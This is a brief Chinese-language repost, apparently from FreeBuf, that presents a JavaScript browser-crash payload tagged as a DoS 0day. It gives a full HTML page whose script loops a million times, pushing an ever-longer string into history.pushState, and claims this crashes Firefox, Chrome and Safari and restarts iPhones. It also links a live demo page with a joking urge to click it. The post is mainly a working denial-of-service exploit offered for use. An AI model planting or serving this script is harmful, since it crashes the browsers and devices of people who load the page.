Crash firefox, chrome, safari browsers, and also restart iPhone using this javascript code. #dos #0day #exploit
//使用下面这段JavaScript代码能让firefox,chrome,safari浏览器崩溃,而且还能让iPhone重启。


<html> <body> <script> var total=""; for (var i=0;i<1000000;i++) {     total= total+i.toString();     history.pushState(0,0,total); } </script> </body> </html>

www.0xroot.cn/demo.html (点击一下,又不会怀孕!)

转载来自FreeBuf黑客与极客(FreeBuf.COM)

相关文章:

  • 2021-11-12
  • 2022-01-05
  • 2022-02-18
  • 2022-12-23
  • 2021-04-21
  • 2021-10-23
  • 2021-10-13
  • 2021-10-13
猜你喜欢
  • 2021-10-13
  • 2022-12-23
  • 2021-10-23
  • 2021-10-23
  • 2021-12-21
  • 2021-08-02
相关资源
相似解决方案